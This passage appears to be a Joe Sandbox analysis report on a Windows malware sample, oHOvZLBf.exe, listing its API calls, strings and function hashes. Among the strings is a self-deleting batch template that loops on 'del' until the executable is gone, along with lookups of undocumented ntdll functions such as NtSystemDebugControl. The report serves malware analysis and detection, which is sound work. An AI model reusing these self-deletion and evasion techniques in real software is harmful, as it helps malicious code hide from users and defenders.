                            • CloseHandle.KERNEL32(00000000), ref: 00DF1612
                            • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00DF162D
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                            • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe$open
                            • API String ID: 617340118-4277398702
                            • Opcode ID: 5a288a98c24a48a0223ea0e321a29d070de248b6a9dfbadb68aad9f937cbe673
                            • Instruction ID: 8af7508eebf03c00e42c894024c87af6bed89773a145578b3235fafbe4ffe72f
                            • Opcode Fuzzy Hash: 5a288a98c24a48a0223ea0e321a29d070de248b6a9dfbadb68aad9f937cbe673
                            • Instruction Fuzzy Hash: D7112176A0122CBED72097A5DC89DFB7A6CDF59761F024052FA49E2140DA709B88CBB0
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00DF1400), ref: 00DF1226
                            • GetProcAddress.KERNEL32(00000000), ref: 00DF122D
                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00DF1400), ref: 00DF123F
                            • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00DF1400), ref: 00DF1250
                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe,?,?,?,?,00DF1400), ref: 00DF129E
                            • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe,?,?,?,?,00DF1400), ref: 00DF12B0
                            • CloseHandle.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe,?,?,?,?,00DF1400), ref: 00DF12F5
                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00DF1400), ref: 00DF130A
                            Strings
                            • ntdll.dll, xrefs: 00DF1219
                            • C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, xrefs: 00DF1262
                            • ZwQuerySystemInformation, xrefs: 00DF1212
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                            • String ID: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe$ZwQuerySystemInformation$ntdll.dll
                            • API String ID: 1500695312-1957651143
                            • Opcode ID: 96648b07f4f6348a93fb114b31d319ceaf46a56c3a8617948aa7032ada55d878
                            • Instruction ID: 114bdaab6099f863740ca620ba826862d7d51074c43b03b5075db8387298c35e
                            • Opcode Fuzzy Hash: 96648b07f4f6348a93fb114b31d319ceaf46a56c3a8617948aa7032ada55d878
                            • Instruction Fuzzy Hash: E221E135605355EBD7209FA4DC0AB7BBAA8FB85B00F068919F745E6280CB70DA44C7B9
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,771AE800,?,?,00DF29DB,?,00000001), ref: 00DF26A7
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,771AE800,?,?,00DF29DB,?,00000001), ref: 00DF26B5
                            • lstrlen.KERNEL32(?), ref: 00DF26C4
                            • ??2@YAPAXI@Z.MSVCRT ref: 00DF26CE
                            • lstrcpy.KERNEL32(00000004,?), ref: 00DF26E3
                            • lstrcpy.KERNEL32(?,00000004), ref: 00DF271F
                            • ??3@YAXPAX@Z.MSVCRT ref: 00DF272D
                            • SetEvent.KERNEL32 ref: 00DF273C
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                            • String ID:
                            • API String ID: 41106472-0
                            • Opcode ID: e751f4c9944ff98f0a39eb5dea05f9bcf6416f40b544e874e29a1ad199713faf
                            • Instruction ID: 41cd1b1f387fc1217983bb1f5b69b94d8823f99d67084bbb7aad0c1b6b2cc952
                            • Opcode Fuzzy Hash: e751f4c9944ff98f0a39eb5dea05f9bcf6416f40b544e874e29a1ad199713faf
                            • Instruction Fuzzy Hash: E8113A75501318AFCB21AF15EC4887B7BA9FB8472172AC016F558CB220D7309E85DB70
                            APIs
                            Strings
                            • .exe, xrefs: 00DF1C57
                            • UygdpvugkCVTcnzAfGCvPnGQLujfhwbFarqsSfRkeOOSYeQoLwZopJtLiFqZsTnWxYXXHlyJlHKGQVBtCOWmacMmZwYaBdERDmDKMNEzMeckgTEdpAxWDVPIuIxlSbyRhNojUAUtIiNrszbFhrHPXJBqijKv, xrefs: 00DF1B8A, 00DF1B9C, 00DF1C15, 00DF1C49
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: lstrcatmemcpymemsetrandsrand
                            • String ID: .exe$UygdpvugkCVTcnzAfGCvPnGQLujfhwbFarqsSfRkeOOSYeQoLwZopJtLiFqZsTnWxYXXHlyJlHKGQVBtCOWmacMmZwYaBdERDmDKMNEzMeckgTEdpAxWDVPIuIxlSbyRhNojUAUtIiNrszbFhrHPXJBqijKv
                            • API String ID: 122620767-497381747
                            • Opcode ID: 3c9d5fd4675e04fb88c4883a368b30b255b98770644008a6dbc15439bfc7eb91
                            • Instruction ID: 1daa51a6615e11fd00c872c8d30933ef859d7771251099dc65ba9c27cabcbd6e
                            • Opcode Fuzzy Hash: 3c9d5fd4675e04fb88c4883a368b30b255b98770644008a6dbc15439bfc7eb91
                            • Instruction Fuzzy Hash: 5D212626E45294EEE32613396C40B7B7B44CFA3721F1BC09AFA959F2A3D5640985C274
                            APIs
                            • memset.MSVCRT ref: 00DF18B1
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,771B0F00,75A38400), ref: 00DF18D3
                            • CloseHandle.KERNEL32(00DF2549), ref: 00DF18E9
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00DF18F0
                            • GetExitCodeProcess.KERNEL32(?,00DF2549), ref: 00DF1901
                            • CloseHandle.KERNEL32(?), ref: 00DF190A
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                            • String ID:
                            • API String ID: 876959470-0
                            • Opcode ID: 472bdea5d9ac02a375d199c5a79bed60fb57a631ead169f5eca7ba68e11c5136
                            • Instruction ID: 0bdf4d13b1e444604cdcdb356e77a0a3d1b7b961664acefbd2882f88f4533a47
                            • Opcode Fuzzy Hash: 472bdea5d9ac02a375d199c5a79bed60fb57a631ead169f5eca7ba68e11c5136
                            • Instruction Fuzzy Hash: B501717690122CBBCB216F96DC48DEF7F3DEF85720F118022FA19E51A0D6714A18CAB0
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00DF1334
                            • GetProcAddress.KERNEL32(00000000), ref: 00DF133B
                            • memset.MSVCRT ref: 00DF1359
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProcmemset
                            • String ID: NtSystemDebugControl$ntdll.dll
                            • API String ID: 3137504439-2438149413
                            • Opcode ID: 3816e7f13745f6c3faac213bc88f98be62c54b96d032c99d1edebc5c722d887c
                            • Instruction ID: e8300a41681c06f78d0309ff6f4e0c31a3adc0601dbba052965bb420b7914fff
                            • Opcode Fuzzy Hash: 3816e7f13745f6c3faac213bc88f98be62c54b96d032c99d1edebc5c722d887c
                            • Instruction Fuzzy Hash: 38016D7560030DEFDB10DF94AC85E7FBBA8FB51314F05812AFA41E2240E2B09615CA71
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: strrchr$lstrcmpilstrcpylstrlen
                            • String ID:
                            • API String ID: 3636361484-0
                            • Opcode ID: 503d4572e27b92d29068e1491a236725386fa8a6b0cc6d83310436675c8fc5b4
                            • Instruction ID: e2a7a3993594e3b31e5a08231df481494b376a5aaf99ed59b4a37ea0ffb623f1
                            • Opcode Fuzzy Hash: 503d4572e27b92d29068e1491a236725386fa8a6b0cc6d83310436675c8fc5b4
                            • Instruction Fuzzy Hash: 9901DB7691431DAFDB105B60DC48FF7779CDB04310F068066FB45E2190DAB49A84CBB4
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(00DF1F92,00000000,?,00000000,?,?,?,00DF1F92,?,00000000,00000002), ref: 00DF1867
                            • srand.MSVCRT ref: 00DF1878
                            • rand.MSVCRT ref: 00DF1880
                            • srand.MSVCRT ref: 00DF1890
                            • rand.MSVCRT ref: 00DF1894
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: Timerandsrand$FileSystem
                            • String ID:
                            • API String ID: 4106363736-0
                            • Opcode ID: ad3eb53e6552f1cb3bed7fe9fd2a91c033d10c9b2155dcdb43898d74c21dfb0c
                            • Instruction ID: b5028c807d55e9f91f85bc4d2e363289f2e5c1294783ed209507a268117ca937
                            • Opcode Fuzzy Hash: ad3eb53e6552f1cb3bed7fe9fd2a91c033d10c9b2155dcdb43898d74c21dfb0c
                            • Instruction Fuzzy Hash: 5AE01277A10318BBD700ABB9EC469AEBBACDE84161B114567F600D3254E974E944CAB4
                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00DF603C
                            • GetProcAddress.KERNEL32(00000000,00DF6064), ref: 00DF604F
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true
                            • Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: kernel32.dll
                            • API String ID: 1646373207-1793498882
                            • Opcode ID: d1940f10b68af6c73c5d2f7bd54d9f31b442e3333d5b6625ed2edad31dba5bed
                            • Instruction ID: d0328524450c7b068b319963386b246728e0d76bad0e92f5b6915ae7044a9a02
                            • Opcode Fuzzy Hash: d1940f10b68af6c73c5d2f7bd54d9f31b442e3333d5b6625ed2edad31dba5bed
                            • Instruction Fuzzy Hash: 5EF0F0B114428D9FEF708FA4CC44BEE3BE4EB45700F54852AEA09CBA81DB3486058B24